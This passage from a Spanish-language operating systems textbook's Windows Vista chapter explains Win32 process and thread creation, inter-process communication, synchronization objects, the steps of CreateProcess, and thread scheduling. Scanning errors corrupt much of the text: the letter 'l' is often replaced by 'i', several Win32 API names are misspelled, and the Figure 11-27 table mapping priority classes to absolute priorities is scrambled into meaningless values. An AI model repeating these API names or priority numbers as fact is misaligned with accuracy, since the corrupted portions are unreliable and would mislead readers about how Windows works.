de utiiizario, aun si se está haciendo pasar por un usuario distinto. 

Como vimos antes, además de ios hiios normaies que se ejecutan dentro de procesos de usua¬ 
rio, Windows tiene varios hiios dei sistema que sóio se ejecutan en ei modo dei kernei y no están 
asociados con ningún proceso de usuario. Todos esos hiios dei sistema se ejecutan en un proceso 
especiai, conocido como proceso del sistema. Este proceso no tiene un espacio de direcciones en 
modo de usuario. Proporciona ei entorno en ei que se ejecutan ios hiios cuando no operan a bene¬ 
ficio de un proceso específico en modo de usuario. M ás adeiante estudiaremos aigunos de estos pro¬ 
cesos junto con ia administración de ia memoria. Aigunos reaiizan tareas administrativas, como ia 
escritura de páginas sucias ai disco, mientras que otros forman ia reserva de hiios trabajadores que 
se asignan para ejecutar tareas de corto piazo deiegadas por ios componentes dei ejecutivo, o por 
ios drivers que necesitan reaiizar cierto trabajo en ei proceso dei sistema. 

11.4.2 Llamadas a la API para administrar trabajos, procesos, hilos y fibras 

Los nuevos procesos se crean mediante ia función createProcess de ia API Win32. Esta función 
tiene muchos parámetros y opciones. Recibe ei nombre dei archivo que se va a ejecutar, ias cade¬ 
nas de ia iínea de comandos (sin anaiizar) y un apuntador a ias cadenas dei entorno. También hay 
banderas y vaiores que controian muchos detaiies, como ia forma en que se configura ia seguridad 
para ei proceso y ei primer hiio, ia configuración dei depurador y ias prioridades de pianificación. 
Hay una bandera que también especifica si ios manejadoras abiertos en ei proceso creador se deben 
pasar ai nuevo proceso. La función también recibe el directorio actuai de trabajo para ei nuevo pro¬ 
ceso y una estructura de datos opcionai, con información acerca de ia Ventana deGUI que debe uti- 
iizar ei proceso. En vez de devoiver sóio un ID para el nuevo proceso, Win32 devuelve los 
manejadoras y los IDs, tanto para el nuevo proceso como para su hilo inicial. 

El gran número de parámetros revela varias diferencias en comparación con el diseño de la 
creación de procesos en UNIX. 

1. La ruta actual de búsqueda para encontrar el programa que se debe ejecutar está enterrada 
en el código de la biblioteca para Win32, pero se administra de manera más explícita en 
UNIX. 

2. En UNIX, el directorio actual de trabajo es un concepto en modo del kernei, pero en Win¬ 
dows es una cadena en modo de usuario. Windows sí abre un manejador en el directorio ac¬ 
tual para cada proceso, con el mismo efecto molesto que en UNIX: no se puede eliminar el 
directorio a menos que se encuentre en otra parte de la red. 
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3. UNIX analiza la línea de comandos y pasa un arreglo de parámetros, mientras que Win32 
deja el análisis de los argumentos para que lo haga el programa individual. Como conse¬ 
cuencia, distintos programas pueden manejar los comodines (por ejemplo, *.txt) y otros 
símbolos especiales de una manera inconsistente. 

4. La opción de heredar o no los descriptores de archivos en UNIX es una propiedad del ma- 
nejador. En Windows es una propiedad tanto del manejador como de un parámetro para la 
creación del proceso. 

5. Win32 está orientado a la GUI, por lo que los nuevos procesos reciben información de ma¬ 
nera directa sobre su ventana primaria, mientras que esta información se pasa en forma de 
parámetrosa las aplicaciones de GUI en UNIX. 

6. Windows no tiene un bit SETUID como propiedad del ejecutable, pero un proceso puede 
crear a otro proceso que se ejecute como un usuario distinto, siempre y cuando pueda obte¬ 
ner un token con las credenciales de ese usuario. 

7. El manejador del proceso y el del hilo que se devuelven de Windows se pueden utilizar pa¬ 
ra modificar el nuevo proceso/hilo de muchas formas sustantivas, incluyendo la duplica¬ 
ción de los manejadores y el establecimiento de las variables de entorno en el nuevo 
proceso. UNIX sólo realiza modificaciones a los nuevos procesos entre las llamadas a fork 
y exec. 

Algunas de estas diferencias son históricas y filosóficas. UNIX se diseñó para ser orientado a 
la línea de comandos y no a la GUI como Windows. Los usuarios de UNIX son más sofisticados y 
comprenden conceptos como las variables PATH. Windows Vista heredó muchas características de 
MS-DOS. 

La comparación también está torcida, ya que Win32 es una envoltura en modo de usuario alre¬ 
dedor de la ejecución del proceso nativo de NT, en forma muy parecida a las envolturas fork/exec 
de la función de biblioteca system en UNIX. Las llamadas al sistema actuales de NT para crear pro¬ 
cesos e hilos (NtcreateProcess y NtcreateThread) son mucho más simples que las versiones de 
Win32. Los principales parámetros para la creación de procesos en NT son un manejador en una 
sección que representa el archivo de programa a ejecutar, una bandera que especifica si el nuevo 
proceso debe (de manera predeterminada) heredarlos manejadores del creador, y los parámetros re¬ 
lacionados con el modelo de seguridad. Todos los detalles de establecer las cadenas de entorno y 
crear el hilo inicial se dejan al código en modo de usuario que puede utilizar el manejador en el nue¬ 
vo proceso para manipular su espacio de direcciones virtuales de manera directa. 

Para dar soporte al subsistema POSIX, la creación de procesos nativos tiene una opción para 
crear un proceso al copiar el espacio de direcciones virtuales de otro proceso, en vez de asignar un 
objeto de sección para un nuevo programa. Esto sólo se utiliza para implementar fork para POSIX, 
y no mediante Win32. 

La creación de hilos pasa el contexto de la CPU para que la utilice el nuevo hilo (que incluye 
el apuntador de la pila y el apuntador a la instrucción inicial), una plantilla para el TEB y una 


868 


CASO DE ESTUDIO 2: WINDOWS VISTA 


CAPITULO 11 


bandera que indica si ei hiio se debe ejecutar de inmediato o si se debe crear en un estado suspen¬ 
dido (en espera de que aiguien iiame a NtResumeTbread en su mane]ador). Las acciones de crear 
ia piia en modo de usuario y meter ios parámetros argv/argc se dejan para ei código en modo de 
usuario que hace ias iiamadas a iasAPIs de administración de memoria nativas de NT en ei mane- 
jadordei proceso. 

En ia versión Windows Vista se inciuyó una nueva API nativa para ios procesos, ia cuai mue¬ 
ve muchos de ios pasos en modo de usuario ai ejecutivo en modo de kernei, y combina ia creación 
dei proceso con ia creación dei hiio iniciai. La razón dei cambio fue aceptar ei uso de ios procesos 
como iímites de seguridad. Por io generai, se considera que todos ios procesos creados por un usua¬ 
rio tienen ia misma confianza. Es ei usuario (que se representa mediante un token) ei que determi¬ 
na en dónde está ei iímite de ia confianza. Este cambio en Windows Vista permite a ios procesos 
proporcionar también iímites de confianza, pero esto significa que ei proceso creador no tiene ios per¬ 
misos suficientes en reiación con un manejador de procesos como para impiementar ios detaiies de ia 
creación de procesos en modo de usuario. 

Comunicación entre procesos 

Los hiios se pueden comunicar de muchas formas, inciuyendo ias tuberías, ias tuberías con nombre, 
ias ranuras de correo, ios sockets, ias iiamadas a procedimientos remotos y ios archivos compartidos. 
Las tuberías tienen dos modos: byte y mensaje: se seiecciona uno de eiios ai momento de su crea¬ 
ción. Las tuberías en modo de byte funcionan iguai que en UNIX. Las tuberías en modo de mensa¬ 
je son algo similares, pero preservan los límites de los mensajes, de manera que cuatro escrituras de 
128 bytes se leerán como cuatro mensajes de 128 bytes y no como un mensaje de 512 bytes, como 
podría ocurrir con las tuberías en modo de byte. También existen las tuberías con nombre, y tienen 
los mismos dos modos que las regulares. Las tuberías con nombre también se pueden utilizar a tra¬ 
vés de una red, pero las regulares no. 

Las ranuras de correo son una característica del sistema operativo OS/2 que se implementó 
en Windows por cuestión de compatibilidad. Son similares a las tuberías en ciertas formas, pero no en 
todo. Por ejemplo, son de una vía, mientras que las tuberías son de dos vías. Se podrían utilizar 
a través de una red, pero no pueden ofrecer una entrega garantizada. Por último, permiten que el 
proceso emisor transmita un mensaje a muchos receptores, en vez de sólo uno. Tanto las ranuras de 
correo como las tuberías con nombre se implementan como sistemas de archivos en Windows, en 
vez de implementarse como funciones del ejecutivo. De esta forma, se pueden utilizar a través de 
la red mediante el uso de los protocolos existentes para sistemas de archivos remotos. 

Los sockets son como las tuberías, excepto que por lo general conectan procesos en distintas 
máquinas. Por ejemplo, un proceso escribe en un socket y otro en una máquina remota lee la infor¬ 
mación del primero. Los sockets también se pueden utilizar para conectar procesos en la misma má¬ 
quina, pero como generan más sobrecarga que las tuberías, por lo general se utilizan sólo en un 
contexto de red. Los sockets se diseñaron originalmente para Berkeley UNIX, y la implementación 
se hizo disponible en muchas partes. Algunas de las estructuras de datos y parte del código de Ber¬ 
keley siguen presentes en Windows en la actualidad, como se reconoce en las notas de la versión 
del sistema. 
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Las RPCs (llamadas a procedimientos remotos) son una forma dequeei proceso A haga queei 
proceso B iiame a un procedimiento en ei espacio de direcciones de B a beneficio de A, y devueiva 
ei resuitado a A. Existen varias restricciones en ios parámetros. Por ejempio, no tiene sentido pasar 
un apuntador a un proceso distinto, por i o que i as estructuras de datos se tienen que empaquetar y 
transmitir de una manera que no sea específica para ios procesos. Por io generai, RPC se impiemen¬ 
ta como un nivei de abstracción encima de un nivei de transporte. En ei caso deWindows, ei trans¬ 
porte puede ser mediante ios sockets deTCP/IP, tuberías con nombre o ALPC. ALPC (Liamada 
avanzada a procedimiento iocai) es una herramienta para pasar mensajes en ei ejecutivo en modo 
de kernei. Está optimizado para ia comunicación entre ios procesos en ia máquina iocai, y no ope¬ 
ra a través de ia red. Ei diseño básico es para enviar mensajes que generan respuesta, y se impie- 
menta una versión iigera de ia iiamada a procedimientos remotos, que ei paquete RPC puede crear en 
ei nivei superior para proporcionar un conjunto más extenso de características que ias disponibies 
en ALPC. Esta herramienta se impi ementa mediante ei uso de una combinación de parámetros de co¬ 
pia y ia asignación temporai de ia memoria compartida, con base en ei tamaño de ios mensajes. 

Por úitimo, ios procesos pueden compartir objetos. Esto inciuyea ios objetos de sesión, que se 
pueden asignaren ei espacio de direcciones virtuaies de distintos procesos ai mismo tiempo. Todas 
ias escrituras que reaiice un proceso aparecerán entonces en ios espacios de direcciones de ios otros 
procesos. M ediante ei uso de este mecanismo, se puede i mpi ementar con faciiidad ei búfer compar¬ 
tido que se utiiiza en ios probiemas de productor-consumidor. 


Sincronización 

L os procesos también pueden utiiizar varios tipos de objetos de sincronización. A sí como Windows 
Vista proporciona muchos mecanismos de comunicación entre procesos, también proporciona mu¬ 
chos mecanismos de sincronización, inciuyendo ios semáforos, ios mutexes, ias regiones críticas y 
ios eventos. Todos estos mecanismos funcionan con hiios y no con procesos, de manera que cuan¬ 
do se bioquea un hiio en un semáforo, ios demás hiios en ese proceso (si ios hay) no se vean afec¬ 
tados y puedan seguir su ejecución. 

Para crear un semáforo se utiiiza ia función createsempahore de iaAPI Win32, ia cuai puede ini- 
ciaiizario con un vaior dado y definir un vaior máximo. Los semáforos son objetos en modo de ker¬ 
nei y, por ende, tienen descriptores de seguridad y manejadoras. Ei manejador para un semáforo se 
puede dupiicar mediante oupiicateHandie y se puede pasar a otro proceso, de manera que se puedan 
sincronizar varios procesos con ei mismo semáforo. Un semáforo también puede recibir un nombre 
en ei espacio de nombres de Win32, y puede tener una ACL para protegerio. Aigunas veces es más 
apropiado compartir un semáforo por su nombre que dupiicar ei manejador. 

Existen ñamadas para up y down, aunque tienen ios siguientes nombres raros: ReieaseSemapho- 
re (para up) y waitForSingieObject (para down). También es posibie dar un tiempo iímite a wait- 
ForSingieObject, de manera que se pueda iiberar ei hiio que hizo ia iiamada en un momento dado, 
aun si ei semáforo permanece en 0 (aunque ios temporizadores vueiven a introducir condiciones 
de competencia). waitForSingieObíect y waitForMuitipieObjects son ias interfaces comunes que 
se utiiizan para esperar a ios objetos despachadores que vimos en ia sección 11.3. Aunque hubiera 
sido posibieenvoiver ia versión de un soio objeto deestasAPIs en una envoitura con un nombre un 
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poco más amigable para los semáforos, muchos hilos utilizan la versión de varios objetos, que pue¬ 
de incluir el tener que esperar varios tipos de objetos de sincronización y otros eventos como la ter¬ 
minación de procesos o hilos, la compleción de operaciones de E/S y la disponibilidad de mensajes 
en sockets y puertos. 

Los mutexes también son objetos en modo de kernel que se utilizan para la sincronización, 
pero son más simples que los semáforos ya que no tienen contadores. En esencia son bloqueos 
con funciones de la API para bloquear waitForSingieObject y desbloquear Reieasewiutex. Al 
igual que los manejadores de semáforos, los manejadores de los mutexes se pueden duplicar y 
pasar entre los procesos, de manera que los hilos en distintos procesos puedan acceder al mismo 
mutex. 

Hay un tercer mecanismo de sincronización llamado secciones críticas, el cual implementa el 
concepto de las regiones críticas. Son similares a los mutexes en Windows, excepto porque son lo¬ 
cales para el espacio de direcciones del hilo creador. Como las secciones críticas no son objetos en 
modo de kernel, no tienen manejadores explícitos ni descriptores de seguridad, y no se pueden pa¬ 
sar entre procesos. Las operaciones de bloqueo y desbloqueo se realizan con EnterCriticaisection 
y LeaveCriticaisection, respectivamente. Como estas funciones de la API se ejecutan al principio 
en espacio de usuario y hacen llamadas al kernel sólo cuando se necesita el bloqueo: son mucho 
más rápidas que los mutexes. Las secciones críticas se optimizan para combinar espera activa (en 
mui ti procesadores), y la sincronización del kernel se utiliza sólo cuando es necesario. En muchas 
aplicaciones es muy raro que haya contiendas en la mayoría de las secciones críticas, o tienen tiem¬ 
pos de contención tan cortos que nunca es necesario asignarles un objeto de sincronización del ker¬ 
nel. Esto produce ahorros considerables en la memoria del kernel. 

El último mecanismo de sincronización que analizaremos utiliza objetos en modo de kernel co¬ 
nocí dos como eventos. C orno vi mos antes, hay dos ti pos: eventos de notificación y eventos de sin¬ 
cronización. Un evento puede estar en uno de dos estados: señalado o no señalado. Un hilo puede 
esperar que se señale un evento mediante waitPorSingieObject. Si otro hilo señala un evento con 
setEvent, lo que ocurra dependerá del tipo de evento. Con un evento de notificación, todos los hi¬ 
los en espera se liberan y el evento permanece activo hasta que se borra en forma manual median¬ 
te ResetEvent. Con un evento de sincronización, si hay uno o más hilos en espera, sólo se libera un 
hilo y se borra el evento. Una operación alternativa es PuiseEvent, que es como setEvent sólo que 
si no hay nadie esperando, se pierde el pulso y se borra el evento. Por el contrario, una operación 
SetEvent que ocurre sin hilos en espera se recuerda, para lo cual el evento se deja en el estado se¬ 
ñalado de manera que un hilo subsiguiente que llame a una función de espera de la API para ese 
evento ya no tendrá que esperar. 

El número de llamadas a la API Win32 que lidian con procesos, hilos y fibras es de casi 100, 
de las cuales la mayoría tratan con IPC de una forma u otra. En la figura 11-26 se muestra un resu¬ 
men de las llamadas antes descritas, así como de otras llamadas importantes. 

H ay que tener en cuenta que no todas estas llamadas son sólo del sistema. A unque algunas son 
envolventes, otras contienen una cantidad considerable de código de la biblioteca, que asigna la se¬ 
mántica deWin32 a lasAPIs nativas de NT. Otras, como lasAPIs para las fibras, son funciones que 
se utilizan sólo en modo de usuario, ya que como vimos antes, el modo de kernel en Windows Vis¬ 
ta no sabe nada sobre las fibras. Se implementan por completo mediante las bibliotecas en modo de 
usuario. 
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Función de la API Win32 

Descripción 

CreateProcess 

Crea un proceso 

CreateThread 

Crea un hilo en un proceso existente 

CreateFiber 

Crea una fibra 

ExitProcess 

Termina el proceso actual con todos sus hilos 

ExitThread 

Termina este hilo 

ExitFiber 

Termina esta fibra 

SwitchToFiber 

Ejecuta una fibra distinta en el hilo actual 

SetPriorityClass 

Establece la clase de prioridad para un proceso 

SetThreadPriority 

Establece la prioridad para un hilo 

CreateSemaphore 

Crea un nuevo semáforo 

CreateMutex 

Crea un nuevo mutex 

OpenSemaphore 

Abre un semáforo existente 

OpenMutex 

Abre un mutex existente 

WaitForSingleObject 

Se bloquea en un solo semáforo, mutex, etc. 

WaitForMuitipleObjects 

Se bloquea en un conjunto de objetos cuyos manejadores se proporcionan 

PulseEvent 

Establece un evento como señalado, y después como no señalado 

ReleaseMutex 

Libera un mutex para que otro hilo lo pueda adquirir 

ReleaseSemaphore 

Incrementa el conteo de semáforos en 1 

EnterCriticalSection 

Adquiere un bloqueo en una sección crítica 

LeaveCriticalSection 

Libera el bloqueo en una sección crítica 


Figura 11-26. Algunas de las llamadas de Win32 para administrar procesos, hiios y 
fibras. 


11.4.3 I mplementación de procesos e hilos 

En esta sección analizaremos con más detalle la forma en que Windows crea un proceso (y el hilo 
inicial). Como Win32 es la interfaz más documentada, empezaremos aquí. Pero bajaremos con ra¬ 
pidez hacia el nivel del kernel para comprender la implementación de la llamada a la API nativa pa¬ 
ra crear un nuevo proceso. Hay muchos más detalles específicos que ignoraremos aquí; por 
ejemplo, cómo es que WOW16 y WOW64 tienen código especial en la ruta de creación, o la for¬ 
ma en que el sistema suministra correcciones específicas para las aplicaciones, para sortear las pe¬ 
queñas incompatibilidades y los errores latentes en las aplicaciones. Nos enfocaremos en las rutas 
de código principal que se ejecutan cada vez que se crean los procesos, y también analizaremos al¬ 
gunos detalles que rellenan los huecos en relación con lo que hemos visto hasta ahora. 

Un proceso se crea cuando otro proceso realiza la llamada a createProcess deWin32. Esta lla¬ 
mada invoca a un procedimiento (en modo de usuario) en kernel32.dll que crea el proceso en va¬ 
rios pasos, mediante el uso de varias llamadas al sistema y la realización de otro trabajo. 
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1. Se convierte el nombre de archivo ejecutable que se recibe como parámetro de un nombre 
de ruta de Win32 en un nombre de ruta de NT. Si el ejecutable sólo tiene un nombre sin un 
nombre de ruta de directorio, se busca en los directorios de la lista de directorios predeter¬ 
minados (que incluyen, pero no se limitan a los que aparecen en la variable PATH en el en¬ 
torno). 

2. Se empaquetan los parámetros de creación de procesos y se pasan junto con el nombre de 
ruta completo del programa ejecutable, a la llamada NtcreateProcess de la API nativa (es¬ 
ta API se agregó en Windows Vista, para que los detalles de la creación de procesos se pu¬ 
dieran manejar en modo de kernel y los procesos se pudieran utilizar como un límite de 
confianza. LasAPIs nativas anteriores que describimos aquí todavía existen, pero la llama¬ 
da CreateProcess deWin32 ya no las utiliza). 

3. Al ejecutarse en modo de kernel, NtcreateuserProcess procesa los parámetros, después 
abre la imagen del programa y crea un objeto de sección que se puede utilizar para asignar 
el programa en el espacio de direcciones virtuales del nuevo proceso. 

4. El administrador de procesos asigna e i nidal iza el objeto de proceso (la estructura de da¬ 
tos del kernel que representa un proceso, tanto para el nivel del kernel como para el nivel 
del ejecutivo). 

5. El administrador de memoria crea el espacio de direcciones para el nuevo proceso, paralo 
cual asigna e inicializa los directorios de páginas y los descriptores de direcciones virtua¬ 
les que describen la porción correspondiente al modo de kernel, incluyendo las regiones 
específicas del proceso, como la entrada en el directorio de páginas de autoasignación, 
que otorga a cada proceso el acceso en modo kernel a las páginas físicas en toda su tabla 
de páginas, mediante el uso de direcciones virtuales del kernel (en la sección 11.5 descri¬ 
biremos con más detalle la autoasignación). 

6. Se crea una tabla de manejadores para el nuevo proceso, y se le permite heredar y dupli¬ 
car todos los manejadores del proceso que hizo la llamada. 

7. Se asigna la página de usuario compartida y el administrador de memoria inicializa las es¬ 
tructuras de datos del conjunto de trabajo que se utilizan para decidir las páginas que se 
van a recortar de un proceso, cuando la memoria física esté en un nivel bajo. Las piezas de 
la imagen ejecutable representadas por el objeto de sección se asignan en el espacio de di¬ 
recciones en modo de usuario del nuevo proceso. 

8. El ejecutivo crea e inicializa el Bloque de Entorno de Proceso (PEB) en modo de usuario, 
que se utiliza tanto en modo de usuario como en modo de kernel para mantener la infor¬ 
mación de estado a nivel del proceso, como los apuntadores al montón en modo de usua¬ 
rio y la lista de bibliotecas cargadas (DLLs). 

9. Se asigna la memoria virtual en el nuevo proceso y se utiliza para pasar parámetros, inclu¬ 
yendo las cadenas de entorno y la línea de comandos. 
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10. Se asigna un ID de proceso de la tabla de manejadores especial (tabla de IDs) que mantie¬ 
ne el kernel para asignar con eficiencia IDs que sean únicos en forma local para los proce¬ 
sos e hilos. 

11. Se asigna e inicializa un objeto hilo. Se asigna una pila en modo de usuario, junto con el 
Bloque de Entorno de Hilo (TE B). Se inicializa el registro CONTEXT, que contiene los va¬ 
lores iniciales del hilo para los registros de la CPU (incluyendo los apuntadores de instruc¬ 
ción y de pila). 

12. Se agrega el objeto de proceso a la lista global de procesos. Los manejadores para los ob¬ 
jetos proceso e hilo se asignan en la tabla de manejadores del proceso que hizo la llama¬ 
da. Se asigna un ID para el hilo inicial de la tabla de IDs. 

13. NtcreateuserProcess regresa a modo de usuario con el proceso recién creado, contenien¬ 
do sólo un hilo que está suspendido pero listo para ejecución. 

14. Si falla la API de NT, el código de Win32 comprueba si éste podría ser un proceso perte¬ 
neciente a otro subsistema, como WOW64. O tal vez el programa esté marcado de forma 
que se deba ejecutar bajo el depurador. Estos casos especiales se manejan mediante códi¬ 
go especial en el código de createPnocess en modo de usuario. 

15. Si NtcreateuserProcess tiene éxito, aún queda trabajo por hacer. Los procesos de Win32 
se tienen que registrar con el proceso del subsistema de Win32, csrss.exe. Kernei 32 .di 1 
envía un mensaje a csrss para indicarle sobre el nuevo proceso, junto con los manejadores 
del proceso y del hilo para que se pueda duplicar a sí mismo. El proceso y los hilos rein¬ 
troducen en las tablas de los subsistemas, de manera que tengan una lista completa de to¬ 
dos los procesos e hilos de Win32. Después el subsistema muestra un cursor que contiene 
un apuntador con un reloj de arena, para indicar al usuario que está ocurriendo algo, pero 
que se puede utilizar el cursor mientras tanto. Cuando el proceso realiza su primera llama¬ 
da a la GUI, por lo general para crear una ventana, el cursor se quita (se acaba su tiempo 
límite después de 2 segundos, si no está próxima una llamada). 

16. Si el proceso es restringido, como Internet Explorer con pocos permisos, el token se mo¬ 
difica para restringir los objetos a los que puede acceder el nuevo proceso. 

17. Si el programa de aplicación se marca como que necesita corrección para ejecutarse de ma¬ 
nera compatible con la versión actual de Windows, se aplican las correcciones necesarias 
(por lo general, las correcciones envuelven las llamadas a la biblioteca para modificar un 
poco su comportamiento, como devolver un número de versión falso o retrasar la libera¬ 
ción de la memoria). 

18. Por último, se hace una llamada a NtResumeThread para reanudar la ejecución del hilo, y se 
devuelve la estructura al proceso que hizo la llamada, la cual contiene los IDs y los mane¬ 
jadores para el proceso y el hilo que se acaban de crear. 
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Planificación 

El kernel de Windows no tiene ningún hiio de pianificación centrai. En vez de eiio, cuando un hiio 
ya no puede seguir ejecutándose, entra ai modo de kernei y iiama ai pianificador para ver con cuái 
hiio se puede cambiar. Las siguientes condiciones ocasionan que ei hiio actuai en ejecución ejecu¬ 
te ei código dei pianificador: 

1. Ei hiio actuai en ejecución sebioquea en un semáforo, mutex, evento, operación deE/S, etc. 

2. Ei hiio señaia a un objeto (por ejempio, reaiiza una operación up en un semáforo o hace que 
se señaie un evento). 

3. Ei quantum expira. 

En ei caso 1, ei hiio ya se está ejecutando en modo de kernei para iievar a cabo ia operación en 
ei despachador u objeto de E/S. No puede continuar, por io que iiama ai código dei pianificador 
para que eiija a su sucesor y cargue ei registro context de ese hiio para continuar su ejecución. 

En ei caso 2, ei hiio en ejecución también está en ei kernei. Sin embargo, después de señaiar 
un objeto puede seguir su ejecución, ya que ia acción de señaiizar un objeto no produce un bioqueo. 
Aun así, ei hiio tiene que iiamar ai pianificador para ver si ei resuitado de su acción ha iiberado a 
un hiio con una prioridad de pianificación mayor, que ahora está iisto para ejecutarse. De ser así, se 
produce un cambio de hiios ya que Windows es compietamente preferente (es decir, ios cambios de 
hiios pueden ocurrir en cuaiquier momento, y no sóio ai finai dei quantum dei hiio actuai). Sin em¬ 
bargo, en ei caso de un muitiprocesador, un hiio que haya pasado ai estado iisto tai vez se pianifi- 
que en una CPU distinta y ei hiio originai puede seguir ejecutándose en ia CPU actuai, aunque su 
prioridad de pianificación sea menor. 

En ei caso 3 se produce una interrupción en ei modo de kernei, y en ese punto ei hiio ejecuta 
ai código dei pianificador para ver quién se va a ejecutar a continuación. Dependiendo de ios hiios 
que estén esperando, se puede seieccionar ei mismo hiio, en cuyo caso recibe un nuevo quantum y 
continúa su ejecución. En caso contrario se produce un cambio de hiio. 

Ei pianificador también se iiama bajo otras dos condiciones: 

1. Se compieta una operación de E/S. 

2. Expira un tiempo de espera. 

En ei primer caso, tai vez un hiio haya estado esperando esta operación de E/S y ahora se puede se¬ 
guir ejecutando. Hay que reaiizar una comprobación para ver si debe reempiazar ei hiio en ejecu¬ 
ción, ya que no hay un tiempo de ejecución mínimo garantizado. Ei pianificador no se ejecuta en ei 
mismo manejador de interrupciones (ya que ias interrupciones podrían estar desactivadas demasia¬ 
do tiempo). En vez de eiio, se pone en coia una DPC para reaiizaria más adeiante, después de que 
termine ei manejador de interrupciones. En ei segundo caso, un hiio ha reaiizado una operación 
down en un semáforo, o ha bioqueado aigún otro objeto, pero con un tiempo iímite que acaba de ex¬ 
pirar. De nuevo, es necesario que ei manejador de interrupciones ponga en coia una DPC para evi¬ 
tar que se ejecute durante ei manejador de interrupciones dei reioj.Si hay un hiio iisto para cuando 
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termine este tiempo iímite, se ejecutará ei pianificador y si ei nuevo hiio ejecutabie tiene mayor 
prioridad, se reempiazaré ei hiio actuai como en ei caso 1. 

Ahora iiegamos ai verdadero aigoritmo de pianificación. LaAPI Win32 proporciona dos APIs 
para infiuir en ia pianificación de hiios. En primer iugar, hay una iiamada Setpriorityciass que 
estabiece ia ciase de prioridad de todos ios hiios en ei proceso dei que hizo ia iiamada. Los vaiores 
permitidos son tiempo reai, aito, arriba de i o normai, normai, debajo de io normai e inactivo. La cia¬ 
se de prioridad determina ias prioridades reiativas de ios procesos (a partir de Windows Vista, ia 
ciase de prioridad de procesos también ia puede utiiizar un proceso para marcarse a sí mismo de 
manera temporai como en segundo piano, io cuai significa que no debe interferir con ninguna otra 
actividad en ei sistema). Observe que ia ciase de prioridad se estabiece para ei proceso, pero afec¬ 
ta a ia prioridad actuai de todos ios hiios en ei proceso, ai estabiecer una prioridad de base con ia 
que empieza cada hiio ai momento de su creación. 

La segunda API Win32 es setThreadPriority. Establece la prioridad relativa de un hilo (que 
puede ser pero no necesariamente, el hilo que hizo la llamada) con respecto a la clase de prioridad 
de su proceso. Los valores permitidos son tiempo crítico, mayor, arriba de lo normal, normal, de¬ 
bajo de lo normal, menor e inactivo. Los hilos de tiempo crítico obtienen la prioridad de programa¬ 
ción más alta que no sea de tiempo real, mientras que los hilos inactivos obtienen la menor, sin 
importar la clase de prioridad. Los demás valores de prioridad ajustan la prioridad base de un hilo 
con respecto al valor normal determinado por la clase de prioridad (+2, -fl, 0, -1, -2, respecti¬ 
vamente). El uso de clases de prioridad y prioridades relativas de los hilos facilita a las aplicacio¬ 
nes la decisión sobre qué prioridades deben especificar. 

El planificador funciona de la siguiente manera. El sistema tiene 32 prioridades, enumeradas 
del 0 al 31. Las combinaciones de la clase de prioridad y la prioridad relativa se asignan en 32 prio¬ 
ridades de hilo absolutas, de acuerdo con la tabla de la figura 11-27. El número en la tabla determi¬ 
na la prioridad base del hilo. Además, cada hilo tiene una prioridad actuai, que puede ser mayor 
(pero no menor) que la prioridad base y que analizaremos en breve. 



Prioridades de hilos de Win32 



Tiempo real 

Alta 

Arriba de 
lo normal 

Normal 

Debajo de 
lo normal 

Inac¬ 

tivo 


Tiempo crítico 

! '31 

15 

15 

16 

15 

15 


Mayor 

1 

15 

ie 

ID 

5 

6 

Prioridades 

Arriba de lo 
jtiormal. 

£5 

14 

11 

3 

7 

5 

de clases de 

procesos 

deWin32 

Normal 


13 


a 

6 

A 

uébajó de lo 

normal 


1 ? 

Q 

7 

S 

3 


Menor 

i 2? 

11 

B 

G 

4 

3 


Inactivo 

_ 'A _ 

1 


1 

1 

1 


Figura 11-27. Asignación de las prioridades de Win32 a las prioridades de Windows. 
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Para utilizar estas prioridades para la planificación, el sistema mantiene un arreglo de 32 listas 
de hilos, que corresponden a las prioridades de la 0 a la 31, las cuales se derivan de la tabla de la 
figura 11-27. Cada lista contiene hilos listos en la prioridad correspondiente. El algoritmo de plani¬ 
ficación básico consiste en buscar en el arreglo desde la prioridad 31 hasta la 0. AI momento de en¬ 
contrar una lista que no esté vacía, se selecciona el hilo a la cabeza de la cola y se ejecuta durante 
un quantum. Si el quantum expira, el hilo pasa al final de la cola en su nivel de prioridad y se se¬ 
lecciona a continuación el hilo que está en la parte frontal. En otras palabras, cuando hay varios hi¬ 
los listos en el nivel de prioridad más alto, se ejecutan por turno rotatorio durante un quantum cada 
uno. Si no hay un hilo listo, el procesador queda inactivo: es decir, se establece en un estado bajo 
de energía, en espera de que ocurra una interrupción. 

Hay que tener en cuenta que para llevar a cabo la planificación, hay que elegir un hilo sin im¬ 
portar a cuál proceso pertenezca. Así, el planificador no elije primero un proceso y después un hi¬ 
lo en ese proceso. Sólo ve los hilos. No toma en cuenta qué hilo pertenece a qué proceso, excepto 
para determinar si también necesita cambiar los espacios de direcciones al cambiar los hilos. 

Para mejorar la escalabilidad de los algoritmos de planificación hacia multiprocesadores con 
un mayor número de procesadores, el planificador trata de no tomar el bloqueo que sincroniza el 
acceso al arreglo global de listas de prioridad. En vez de ello, verifica si puede despachar de mane¬ 
ra directa un hilo que esté listo para ejecutarse al procesador correspondiente. 

Para cada hilo, el planificador mantiene la noción de su procesador ideal y trata de planifi¬ 
carlo en ese procesador siempre que sea posible. Esto mejora el rendimiento del sistema, ya que 
es más probable que los datos que utilice un hilo ya estén disponibles en la caché que pertenece a 
su procesador ideal. El planificador está al tanto de los multi procesadores, en donde cada CPU tie¬ 
ne su propia memoria y puede ejecutar programas fuera de cualquier memoria: pero esto tiene un 
costo si la memoria no es local. A estos sistemas se les conoce como máquinas NUM A (NonU ni- 
form M emory Access, Acceso no uniforme a memoria). El planificador trata de optimizar la colo¬ 
cación de los hilos en dichas máquinas. El administrador de memoria trata de asignar páginas 
físicas en el nodo NUM A que pertenece al procesador ideal para los hilos, cuando se produce un 
fallo de página. 

En la figura 11-28 se muestra el arreglo de encabezados de cola. La figura muestra que hay en 
realidad cuatro categorías de prioridades: tiempo real, usuario, cero e inactivo, que en efecto es -1. 
Estas prioridades merecen unos comentarios. Las prioridades de la 16 a la 31 se llaman de tiempo 
real, y están diseñadas para crear sistemas que cumplan con las restricciones de tiempo real, como 
los tiempos límite. Los hilos con prioridades de tiempo real se ejecutan antes que cualquiera de los 
hilos con prioridades dinámicas, pero no antes de las DPCs y las ISRs. Si una aplicación de tiem¬ 
po real desea ejecutarse en el sistema, tal vez requiera drivers de dispositivos que tengan cuidado 
de no ejecutar DPCs o ISRs por un periodo extendido, ya que podrían hacer que los hilos de tiem¬ 
po real se excedieran de sus tiempos límite. 

Los usuarios ordinarios no pueden ejecutar hilos en tiempo real. Si un hilo de usuario se ejecu¬ 
tara a una prioridad mayor que (por decir) el hilo del teclado o del ratón y entrara en un ciclo, el hi¬ 
